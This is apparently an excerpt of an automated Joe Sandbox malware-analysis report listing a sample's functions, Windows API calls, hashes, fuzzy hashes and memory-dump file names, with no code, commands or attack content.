                                                                                                    • Opcode ID: ac97b4c43902d33c4ec92173f30c2d26f5861e0743695127f772d8a548054a39
                                                                                                    • Instruction ID: 30474918492498bb91211670a29ff49fdc253e9dfa5896dcd6875afdeb4a427d
                                                                                                    • Opcode Fuzzy Hash: ac97b4c43902d33c4ec92173f30c2d26f5861e0743695127f772d8a548054a39
                                                                                                    • Instruction Fuzzy Hash: A0E04F353402147BC610BA6AEC41F97775CDFC5B14F10441EFE5C67142C6B5B90186A5
                                                                                                    Function 009B07AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                    Function 009AF9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 244 9af9f0-9afa05 LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                    Function 009AFAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 245 9afae8-9afafd LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                    Function 009AFB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 246 9afb68-9afb7d LdrInitializeThunk
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                    Function 009AFDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                    Function 00413E3B Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(6z95F416,00000111,00000000,00000000), ref: 00413EBA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 6z95F416$6z95F416$U
                                                                                                    • API String ID: 1836367815-1488886442
                                                                                                    • Opcode ID: e1141bcc19d14026d44e04504ffaa5eabbf50b348636554287f31f6c5b809c23
                                                                                                    • Instruction ID: 77b8f06ecf4c598e9117fb0ad244738258d9e5b9aeae9413597ef242356a2757
                                                                                                    • Opcode Fuzzy Hash: e1141bcc19d14026d44e04504ffaa5eabbf50b348636554287f31f6c5b809c23
                                                                                                    • Instruction Fuzzy Hash: 9501E5B1D0121CBAEB10ABE19C81DEF7B3CEF41694F048069FA046B240E6794F068BB5
                                                                                                    Function 00413CD5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 170COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 14 413cd5-413d02 15 413d03-413d08 14->15 16 413d09-413d0b 15->16 16->15 17 413d0d-413d10 16->17 17->16 18 413d12-413d1a 17->18 19 413d1c 18->19 20 413d3f-413d95 18->20 19->20 22 413d97-413d9d 20->22 23 413ded-413e29 20->23 25 413dbb-413dbd 22->25 24 413e2a-413e2b 23->24 26 413e47-413ead call 42e5e3 call 42eff3 call 4175f3 call 4046f3 call 424d13 24->26 27 413e2d-413e2e 24->27 25->24 28 413dbf-413dce 25->28 40 413ecd-413ed3 26->40 41 413eaf-413ebe PostThreadMessageW 26->41 27->25 29 413e30-413e3a 27->29 41->40 42 413ec0-413eca 41->42 42->40
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 6z95F416$6z95F416
                                                                                                    • API String ID: 0-1711006443
                                                                                                    • Opcode ID: 5916660ccd5641919a1c29a873cf93e9faeb33e0c742dc781745e6c8ab64a584
                                                                                                    • Instruction ID: dc8aa834b5320529191e24cc97722c6782054caa585890ef7fba371710979100
                                                                                                    • Opcode Fuzzy Hash: 5916660ccd5641919a1c29a873cf93e9faeb33e0c742dc781745e6c8ab64a584
                                                                                                    • Instruction Fuzzy Hash: 5351EF72A04294AFDB05CF69DC81EEFBBB8EF4235470445AEE4509B202D3298E42C7D9
                                                                                                    Function 00413E43 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 43 413e43-413e55 44 413e5d-413ead call 42eff3 call 4175f3 call 4046f3 call 424d13 43->44 45 413e58 call 42e5e3 43->45 54 413ecd-413ed3 44->54 55 413eaf-413ebe PostThreadMessageW 44->55 45->44 55->54 56 413ec0-413eca 55->56 56->54
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(6z95F416,00000111,00000000,00000000), ref: 00413EBA
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID: 6z95F416$6z95F416
                                                                                                    • API String ID: 1836367815-1711006443
                                                                                                    • Opcode ID: 247c2cb7c5c52ffb5eb69ca6dc854c34289a0b52efc5148f43d6751407cdbf8d
                                                                                                    • Instruction ID: f10270625e5dc92c68258f0232b3cd4dcae614a49ba2bf94f5ecb21f47ad6814
                                                                                                    • Opcode Fuzzy Hash: 247c2cb7c5c52ffb5eb69ca6dc854c34289a0b52efc5148f43d6751407cdbf8d
                                                                                                    • Instruction Fuzzy Hash: 4E01C4B1D0021CBAEB10AAE19C81DEF7B7CEF41698F048069FA04A7241E67D5F0647B5
                                                                                                    Function 0042C7F3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 57 42c7f3-42c837 call 404783 call 42d6c3 RtlFreeHeap
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C832
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID: AcA
                                                                                                    • API String ID: 3298025750-3239212935
                                                                                                    • Opcode ID: 1e96225afe08b9273e61a5852ac3e22411838b467e08afe5843f7510d07b2ee8
                                                                                                    • Instruction ID: dc65de1a7714ddc9f0030df07a1b9deac78c7594a76851e62b9ed2031c6aeccf
                                                                                                    • Opcode Fuzzy Hash: 1e96225afe08b9273e61a5852ac3e22411838b467e08afe5843f7510d07b2ee8
                                                                                                    • Instruction Fuzzy Hash: 3BE06DB17042087BC610EE59DC45F9B77ACDFC5B14F000419FD08A7241D6B1B9118AB9
                                                                                                    Function 0042C7A3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 229 42c7a3-42c7e4 call 404783 call 42d6c3 RtlAllocateHeap
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(?,0041E434,?,?,00000000,?,0041E434,?,?,?), ref: 0042C7DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: 64c00d02f523502eb1660e3799242fc5495c015b61913834d372ac60d948e997
                                                                                                    • Instruction ID: 7acd433c533aab11e6ed9c04a21891b5126a1552eec8437867cece84375c4076
                                                                                                    • Opcode Fuzzy Hash: 64c00d02f523502eb1660e3799242fc5495c015b61913834d372ac60d948e997
                                                                                                    • Instruction Fuzzy Hash: 50E06DB22002047BC610EF59EC45E9B77ADDFC5710F000419F918A7241D771B9108BB9
                                                                                                    Function 0042C843 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 239 42c843-42c87f call 404783 call 42d6c3 ExitProcess
                                                                                                    APIs
                                                                                                    • ExitProcess.KERNELBASE(?,00000000,00000000,?,D2355E8B,?,?,D2355E8B), ref: 0042C87A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_400000_ekte.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExitProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 621844428-0
                                                                                                    • Opcode ID: 70dbe3668ed7c10ea1d60b24a3b03d86c8d677dc8f3fa783b2cedd13162d6288
                                                                                                    • Instruction ID: 4b5b47a976eb51f8b15a2b04cdfb5a9708e7c412ba6db9b18aef733ca89ee91a
                                                                                                    • Opcode Fuzzy Hash: 70dbe3668ed7c10ea1d60b24a3b03d86c8d677dc8f3fa783b2cedd13162d6288
                                                                                                    • Instruction Fuzzy Hash: ECE086352006147BD110FB5ADC41F97776CDFC5B24F408419FA08A7141CA717901C7F4

                                                                                                    Non-executed Functions

                                                                                                    Function 009A0080 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: [Pj
                                                                                                    • API String ID: 0-2289356113
                                                                                                    • Opcode ID: 650b631b826afc322e58d1fe92736e6ce5eb56e6716a2e9ba40f1893c93b1194
                                                                                                    • Instruction ID: d3cfda1505344444e7e61d792879a165104aed3c7e435b61ca9e638d6aad1cb3
                                                                                                    • Opcode Fuzzy Hash: 650b631b826afc322e58d1fe92736e6ce5eb56e6716a2e9ba40f1893c93b1194
                                                                                                    • Instruction Fuzzy Hash: A4F06231204204ABDB11AA10CC85F2A7BA9BFD6754F14C818F9456A093C776C811D761
                                                                                                    Function 009C26F8 Relevance: .0, Instructions: 44COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                    • Instruction ID: 20c361e048fd47ee2666f81de9c99e82315c2afe0a218ebd378aa5cf3406533a
                                                                                                    • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                                                                                    • Instruction Fuzzy Hash: 8FF0AF21B24159ABDB48EB189991F6A3399EB94300F54C43DE949CB251D625AD408692
                                                                                                    Function 00A00101 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                    • Instruction ID: de9a9357598e61dc4a6dd26c9662881e709470e90d601e2f260cf2ef96f0c187
                                                                                                    • Opcode Fuzzy Hash: 918068312069b50acfbd4a9a4d65495103bc908bf178a7527bf00e793ba52eab
                                                                                                    • Instruction Fuzzy Hash: 1AF08C722403089FCB1CCF05E4A0FB937B2AB80719F24812CE50B8F6D0D739A881CA95
                                                                                                    Function 009A00EA Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1252154e3b8d7a7a0caeed3da86639fe6893fa471d5965cbe31bbb7a634307e
                                                                                                    • Instruction ID: 94b6180c038a6fe44c59627f1d03e90c84a6c16df02d953b11aa9443811a49b8
                                                                                                    • Opcode Fuzzy Hash: f1252154e3b8d7a7a0caeed3da86639fe6893fa471d5965cbe31bbb7a634307e
                                                                                                    • Instruction Fuzzy Hash: 37E01A71549B91CBD321DF54D901B1AB3E4FFC9B10F15483AF40A97750D7789A05CA92
                                                                                                    Function 009B00C4 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                                                                    Function 009B0048 Relevance: .0, Instructions: 6COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: true
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000990000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A80000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A90000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A94000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000A97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000008.00000002.418645615.0000000000B00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_8_2_990000_ekte.jbxd
                                                                                                    Similarity
